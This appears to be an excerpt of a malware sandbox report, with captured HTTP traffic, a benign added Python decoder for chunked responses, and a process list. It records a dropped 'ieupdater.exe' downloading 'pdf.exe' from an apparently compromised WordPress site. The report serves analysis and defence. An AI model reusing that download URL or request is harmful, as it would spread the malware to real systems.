Data Ascii: cName() { return "likehttpruedigerbaltissencomwpcontentuploads201209pdfexe"; } function GcName() { return "gplushttpruedigerbaltissencomwpcontent
Total Bytes Transferred (KB): 18
Jun 5, 2014 13:05:19.322809935 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 72 62 61 6c 74 69 73 73 65 6e 63 6f 6d 77 70 63 6f 6e 74 65 6e 74 75 70 6c 6f 61 64 73 32 30 31 32 30 39 70 64 66 65 78 65 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 09 3c 73 74 79 6c 65 20 74 79 70 65 3d
Data Ascii: rbaltissencomwpcontentuploads201209pdfexe"; }</script><style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <script type="text/javascript"> // <![CDATA[
Total Bytes Transferred (KB): 19
Jun 5, 2014 13:05:19.341712952 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 69 67 65 72 62 61 6c 74 69 73 73 65 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 68 69 72 74 65 65 6e 2f 61 73 73 65 74 73 2f 65 78 70 72 65 73 73 69 6e 73 74 61 6c 6c 2e 73 77 66 22 3b 0a 20 09 76
Data Ascii: igerbaltissen.com/wp-content/themes/twentythirteen/assets/expressinstall.swf"; var imwbvp_ajaxurl = 'http://ruedigerbaltissen.com/wp-admin/admin-ajax.php'; // </script> </head><body class="error404 single-author"><div id="page" cl
Total Bytes Transferred (KB): 20
Jun 5, 2014 13:05:19.341742039 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 65 61 72 63 68 22 20 2f 3e 0a 09 09 09 3c 2f 66 6f 72 6d 3e 09 09 09 09 3c 2f 6e 61 76 3e 3c 21 2d
Data Ascii: nput type="submit" class="search-submit" value="Search" /></form></nav> #site-navigation --></div> #navbar --></header> #masthead --><div id="main" class="site-main"><div id="primary" class="content-area"><
Total Bytes Transferred (KB): 22
Jun 5, 2014 13:05:19.341753006 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 74 22 3e 53 65 61 72 63 68 20 66 6f 72 3a 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 69 65 6c 64 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22
Data Ascii: t">Search for:</span><input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /></label><input type="submit" class="search-submit" value="Search" /></form></aside><asid
Total Bytes Transferred (KB): 23
Jun 5, 2014 13:05:19.342390060 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 69 74 61 72 62 65 69 74 65 72 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 3c 2f 61 73 69 64 65 3e 3c 61 73 69 64 65 20 69 64 3d 22 72 65 63 65 6e 74 2d 63 6f 6d 6d 65 6e 74 73 2d 32 22 20 63 6c 61 73 73
Data Ascii: itarbeiter</a></li></ul></aside><aside id="recent-comments-2" class="widget widget_recent_comments"><h3 class="widget-title">Recent Comments</h3><ul id="recentcomments"><li class="recentcomments">Fritz on <a href="http://ruedige
Total Bytes Transferred (KB): 24
Jun 5, 2014 13:05:19.342834949 CEST | 80 | 1032 | 38.102.226.69 | 192.168.1.10
Data Raw: 6d 70 6c 65 20 53 79 6e 64 69 63 61 74 69 6f 6e 22 3e 52 53 53 3c 2f 61 62 62 72 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 09 09 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 20 74 69 74 6c 65
Data Ascii: mple Syndication">RSS</abbr></a></li><li><a href="http://wordpress.org/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a></li></ul></aside></div> .widget-area --></div><
Total Bytes Transferred (KB): 25
Jun 5, 2014 13:05:19.980375051 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7477
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=6919fc02-27ef-4090-bed1-5234bf1fe9c6; path=/
Set-Cookie: VisitorID=582a28ee-461a-4a82-9824-efe49f9a92a1&Exp=6/5/2017 4:05:19 AM; expires=Mon, 05-Jun-2017 11:05:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 05 Jun 2014 11:05:20 GMT
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e
Data Ascii: <!doctype html><html>
Total Bytes Transferred (KB): 26
Jun 5, 2014 13:05:19.983627081 CEST | 1034 | 80 | 192.168.1.10 | 38.102.226.69
GET /wp-content/uploads/2012/09/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: ruedigerbaltissen.com
Cookie: PHPSESSID=2a7b875c096aecdecb60c18df4bdcc6b
Total Bytes Transferred (KB): 26
Jun 5, 2014 13:05:20.093738079 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Data Raw: 0d 0a 09 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65
Data Ascii: <head><meta charset="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/><meta name="viewport" content="width=device-width, initial-scale=1"/> <title>Bestwsos.com</title><meta name="keywords" con
Total Bytes Transferred (KB): 28
Jun 5, 2014 13:05:20.093748093 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Data Raw: 2c 0d 0a 20 20 20 20 27 61 64 74 65 73 74 27 3a 20 27 6f 66 66 27 2c 0d 0a 20 20 20 20 27 68 6c 27 3a 20 27 27 0d 0a 7d 3b 0d 0a 0d 0a 76 61 72 20 73 65 61 72 63 68 62 6f 78 42 6c 6f 63 6b 20 3d 0d 0a 7b 0d 0a 20 20 20 20 27 63 6f 6e 74 61 69 6e
Data Ascii: , 'adtest': 'off', 'hl': ''};var searchboxBlock ={ 'container': 'searchbox', 'type': 'searchbox', 'width': '300px', 'widthSearchButton': 70, 'colorBackground': 'transparent', 'colorSearchButton':
Total Bytes Transferred (KB): 29
Jun 5, 2014 13:05:20.094058037 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Data Raw: 20 20 20 27 74 69 6d 65 27 3a 20 27 36 2f 35 2f 32 30 31 34 20 34 3a 30 35 3a 32 31 20 41 4d 27 2c 0d 0a 20 20 20 20 27 74 69 63 6b 73 27 3a 20 27 36 33 35 33 37 35 33 37 39 32 31 34 38 34 30 35 32 35 27 2c 0d 0a 20 20 20 20 27 64 6f 6d 61 69 6e
Data Ascii: 'time': '6/5/2014 4:05:21 AM', 'ticks': '635375379214840525', 'domainName': 'bestwsos.com', 'searchText': '', 'actionCode': 'InitialView', 'adNetworkID': '2010001', 'moduleID': '29', 'resultLinkType': '5',
Total Bytes Transferred (KB): 30
Jun 5, 2014 13:05:20.129718065 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Data Raw: 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 5d 2c 0d 0a 20 20 20 20 27 61 70 69 49 74 65 72 61 74 69 6f 6e 27 3a 20 30 2c 0d 0a 20 20 20 20 27 6d 6f 62 69 6c 65 42 72 6f 77 73 65 72 54 79 70 65 27 3a 20 34 2c 0d 0a 20 20 20 20 27 61 64 4c
Data Ascii: } ], 'apiIteration': 0, 'mobileBrowserType': 4, 'adLineFormat': 3, 'wClass': 'wr', 'terms': '', 'adHeader': 'Sponsored Listings'};new google.ads.domains.Caf(pageOptions, searchboxBlock, rsbloc
Total Bytes Transferred (KB): 31
Jun 5, 2014 13:05:20.130269051 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Data Raw: 68 65 5f 54 69 6d 65 3a 20 35 6d 73 20 28 31 38 25 29 0d 0a 20 20 20 20 20 20 20 44 61 74 61 62 61 73 65 5f 54 69 6d 65 3a 20 32 30 6d 73 20 28 36 34 25 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 41 50 49 5f 54 69 6d 65 3a 20 33 6d 73 20 28 31
Data Ascii: he_Time: 5ms (18%) Database_Time: 20ms (64%) API_Time: 3ms (12%)=================================================** END DEBUG OUTPUT **=================================================-->
Total Bytes Transferred (KB): 33
Jun 5, 2014 13:05:20.130831957 CEST | 80 | 1033 | 64.74.223.34 | 192.168.1.10
Data Raw: 72 79 20 7b 20 72 65 74 75 72 6e 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 27 29 3b 20 7d 20 63 61 74 63 68 28 65 29 20 7b 7d 0d 0a 20 20 74 72 79 20 7b 20 72 65 74 75 72 6e 20
Data Ascii: ry { return new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) {} try { return new XMLHttpRequest(); } catch(e) {} return null;}GetIPPI('34b04ecb-c76f-4abb-b58f-6e26dff7a3cf');</script><script type="text/javascript">var gaJ
Total Bytes Transferred (KB): 34
Jun 5, 2014 13:05:21.315256119 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
HTTP/1.1 404 Not Found
Date: Thu, 05 Jun 2014 11:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://ruedigerbaltissen.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="CAO IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: cookies=yes; expires=Thu, 05-Jun-2014 12:05:19 GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Raw: 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d
Data Ascii: 34<!DOCTYPE htm
Total Bytes Transferred (KB): 35
Jun 5, 2014 13:05:21.438172102 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Data Raw: 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 0d 0a 63 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 0d 0a 33 33 0d 0a 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b
Data Ascii: l> [if IE 7]><html class="ie ie7" clang="en-US"33><![endif]--> [if IE 8]><html class="ie ie8" clang="en-US"38><![endif]--> [if !(IE 7) | !(IE 8) ]> ><html clang="en-US"
Total Bytes Transferred (KB): 35
Jun 5, 2014 13:05:21.470055103 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Data Raw: 32 61 0d 0a 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a 33 36 64 37 0d 0a 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72
Data Ascii: 2a> <![endif]--><head><meta charset="36d7UTF-8"><meta name="viewport" content="width=device-width"><title>Page not found | Betriebliche Altersvorsorge</title><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pin
Total Bytes Transferred (KB): 36
Jun 5, 2014 13:05:21.470083952 CEST | 80 | 1034 | 38.102.226.69 | 192.168.1.10
Data Raw: 79 74 68 69 72 74 65 65 6e 2f 63 73 73 2f 69 65 2e 63 73 73 3f 76 65 72 3d 32 30 31 33 2d 30 37 2d 31 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c
Data Ascii: ythirteen/css/ie.css?ver=2013-07-18' type='text/css' media='all' /><![endif]--><script type='text/javascript' src='http://ruedigerbaltissen.com/wp-includes/js/jquery/jquery.js?ver=1.10.2'></script><script type='text/javascript' src='http://
38
Jun 5, 2014 13:05:21.470094919 CEST80103438.102.226.69192.168.1.10Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6d 61 69 6c 3a 20 65 6d 61 69 6c 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 73 74 6e 61 6d 65 20 3a 20 6c 69 73 74 6e 61 6d 65 2c 0d 0a 20 20 20 20 20 20 20 20 20
Data Ascii: email: email, listname : listname, meta_web_form_id: meta_web_form_id, meta_message: meta_message, redirect: redirect, met
39
Jun 5, 2014 13:05:21.470556021 CEST80103438.102.226.69192.168.1.10Data Raw: 20 20 20 20 20 20 20 20 20 20 73 70 65 63 69 61 6c 69 64 3a 20 73 70 65 63 69 61 6c 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 69 65 6e 74 69 64 3a 20 63 6c 69 65 6e 74 69 64 2c 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: specialid: specialid, clientid: clientid, formid:
40
Jun 5, 2014 13:05:21.473357916 CEST80103438.102.226.69192.168.1.10Data Raw: 66 6f 72 6d 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 61 6c 6c 69 73 74 69 64 3a 20 72 65 61 6c 6c 69 73 74 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 75 62 6c 65 6f 70
Data Ascii: formid, reallistid: reallistid, doubleopt: doubleopt, redirect: redirect, errorredirect: errorredirect }; jQuery.post('/wp-admin/admi
41
Jun 5, 2014 13:05:21.473386049 CEST80103438.102.226.69192.168.1.10Data Raw: 65 78 65 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 4c 63 4e 61 6d 65 28 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: exe"; } function LcName() { return "likehttpruedigerbaltissencomwpcontentuploads201209pdfexe"; } function GcName() {
43
Jun 5, 2014 13:05:21.473948956 CEST80103438.102.226.69192.168.1.10Data Raw: 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 22 63 6f 6d 68 74 74 70 72 75 65 64 69 67 65 72 62 61 6c 74 69 73 73 65 6e 63 6f 6d 77 70 63 6f 6e 74 65 6e 74 75 70 6c 6f 61 64 73 32 30 31 32 30
Data Ascii: { return "comhttpruedigerbaltissencomwpcontentuploads201209pdfexe"; }</script><style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
44
Jun 5, 2014 13:05:21.482744932 CEST80103438.102.226.69192.168.1.10Data Raw: 69 74 6c 65 22 3e 42 65 74 72 69 65 62 6c 69 63 68 65 20 41 6c 74 65 72 73 76 6f 72 73 6f 72 67 65 3c 2f 68 31 3e 0a 09 09 09 09 3c 68 32 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 2f 68 32 3e 0a 09 09 09 3c
Data Ascii: itle">Betriebliche Altersvorsorge</h1><h2 class="site-description"></h2></a><div id="navbar" class="navbar"><nav id="site-navigation" class="navigation main-navigation" role="navigation"><h3 class="menu-toggle">Menu</h
45
Jun 5, 2014 13:05:21.519324064 CEST80103438.102.226.69192.168.1.10Data Raw: 6f 6e 3d 22 68 74 74 70 3a 2f 2f 72 75 65 64 69 67 65 72 62 61 6c 74 69 73 73 65 6e 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65
Data Ascii: on="http://ruedigerbaltissen.com/"><label><span class="screen-reader-text">Search for:</span><input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /></label><in
46
Jun 5, 2014 13:05:21.519355059 CEST80103438.102.226.69192.168.1.10Data Raw: 6f 6c 65 3d 22 63 6f 6d 70 6c 65 6d 65 6e 74 61 72 79 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 61 72 65 61 22 3e 0a 09 09 09 3c 61 73 69 64 65 20 69 64 3d 22 73 65 61 72 63 68 2d 32 22 20 63 6c 61 73 73 3d 22 77 69
Data Ascii: ole="complementary"><div class="widget-area"><aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="http://ruedigerbaltissen.com/"><label><span class="screen-reader-text
48
Jun 5, 2014 13:05:21.519366026 CEST80103438.102.226.69192.168.1.10Data Raw: 77 69 64 67 65 74 5f 61 72 63 68 69 76 65 22 3e 3c 68 33 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 74 69 74 6c 65 22 3e 41 72 63 68 69 76 65 73 3c 2f 68 33 3e 09 09 3c 75 6c 3e 0a 09 09 09 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a
Data Ascii: widget_archive"><h3 class="widget-title">Archives</h3><ul><li><a href='http://ruedigerbaltissen.com/2013/12' title='December 2013'>December 2013</a></li><li><a href='http://ruedigerbaltissen.com/2012/09' title='September 2012'>Septembe
49
Jun 5, 2014 13:05:21.519810915 CEST80103438.102.226.69192.168.1.10Data Raw: 6e 66 6f 20 2d 2d 3e 0a 09 09 3c 2f 66 6f 6f 74 65 72 3e 3c 21 2d 2d 20 23 63 6f 6c 6f 70 68 6f 6e 20 2d 2d 3e 0a 09 3c 2f 64 69 76 3e 3c 21 2d 2d 20 23 70 61 67 65 20 2d 2d 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a
Data Ascii: nfo --></footer> #colophon --></div> #page --><script type='text/javascript' src='http://ruedigerbaltissen.com/wp-includes/js/jquery/jquery.masonry.min.js?ver=2.1.05'></script><script type='text/javascript' src='http://ruedige
50
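The numbers that appear inline in the Data Ascii column above (the 34 before <!DOCTYPE, the c in clang=, the 33 and 38 after lang="en-US", the 36d7 inside charset=") are not page content. The response is sent with Transfer-Encoding: chunked, and the column drops the CRLF framing, so each hex chunk-size line runs into the HTML around it. The Python below is an added example, not part of the sandbox report or its tooling: it takes the first two Data Raw rows above verbatim as constructed input, decodes the chunked framing (tolerating the truncated final chunk, since the report shows only an excerpt of each packet), and reproduces a report-style ASCII rendering to show where the artifact comes from. DATA_RAW_ROWS and all function names are the example's own.

```python
"""Added example: decode the chunked HTTP body carried in the report's 'Data Raw' hex."""
from typing import List, Tuple

# Constructed input, copied verbatim from the report: the trailing bytes of the
# header packet and the next server packet, in stream order. The second row is a
# truncated excerpt, so the stream ends in the middle of a chunk.
DATA_RAW_ROWS = [
    "33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d",
    "6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 "
    "20 69 65 37 22 20 0d 0a 63 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 0d 0a 33 33 0d 0a 3e 0a 3c 21 "
    "5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b",
]


def hex_rows_to_bytes(rows: List[str]) -> bytes:
    """Join the report's space-separated hex rows into one byte stream."""
    return bytes.fromhex(" ".join(rows))


def decode_chunked(stream: bytes) -> Tuple[bytes, List[int], bool]:
    """Decode RFC 7230 chunked framing: <hex-size>[;ext]CRLF <data>CRLF ... 0CRLF CRLF.

    Returns (body, chunk_sizes, complete). A capture that stops mid-chunk, as the
    excerpt above does, yields the bytes seen so far with complete=False instead of
    raising, which is what you want when reassembling partial pcap data.
    """
    body = bytearray()
    sizes: List[int] = []
    pos = 0
    while True:
        eol = stream.find(b"\r\n", pos)
        if eol < 0:                          # size line cut off by the capture
            return bytes(body), sizes, False
        size_field = stream[pos:eol].split(b";", 1)[0].strip()
        if not size_field:
            return bytes(body), sizes, False
        size = int(size_field, 16)           # ValueError on non-hex framing is a real error
        pos = eol + 2
        if size == 0:                        # last-chunk marker; trailers are ignored
            return bytes(body), sizes, True
        sizes.append(size)
        data = stream[pos:pos + size]
        body += data
        if len(data) < size:                 # truncated inside the chunk data
            return bytes(body), sizes, False
        pos += size
        if stream[pos:pos + 2] != b"\r\n":   # truncated or malformed right after the data
            return bytes(body), sizes, False
        pos += 2


def report_style_ascii(stream: bytes) -> str:
    """Mimic the report's 'Data Ascii' column: printable bytes only, framing dropped.

    This is why the report shows 'clang="en-US"33>' where the wire actually carries
    the chunk-size lines 'c' and '33' between pieces of the HTML.
    """
    return "".join(chr(b) for b in stream if 0x20 <= b < 0x7F)


if __name__ == "__main__":
    stream = hex_rows_to_bytes(DATA_RAW_ROWS)
    body, sizes, complete = decode_chunked(stream)
    print("chunk sizes:", [hex(s) for s in sizes], "complete:", complete)
    print("decoded body:", repr(body.decode("utf-8")))
    print("report-style ascii:", report_style_ascii(stream))
```

On the two rows above the decoder recovers chunk sizes 0x34, 0xc and 0x33 and the clean fragment `<!DOCTYPE html>\n<!--[if IE 7]>\n<html class="ie ie7" lang="en-US">\n<![endif]-->\n<!--[`, reporting the stream as incomplete because the 0x33 chunk is cut off by the excerpt. Feed it the full reassembled TCP stream and the same function returns the whole 404 page with complete=True.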

Hooks - Code Manipulation Behavior

System Behavior

General

Start time:15:20:42
Start date:05/06/2014
Path:C:\Ref_12242013.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x400000
File size:12800 bytes
MD5 hash:C77DD48C57156A20F0E32022E489546E

General

Start time:15:20:43
Start date:05/06/2014
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ieupdater.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ieupdater.exe
Imagebase:0x400000
File size:12840 bytes
MD5 hash:DE158F1023935942A4ECED310FA6BBB5

Disassembly
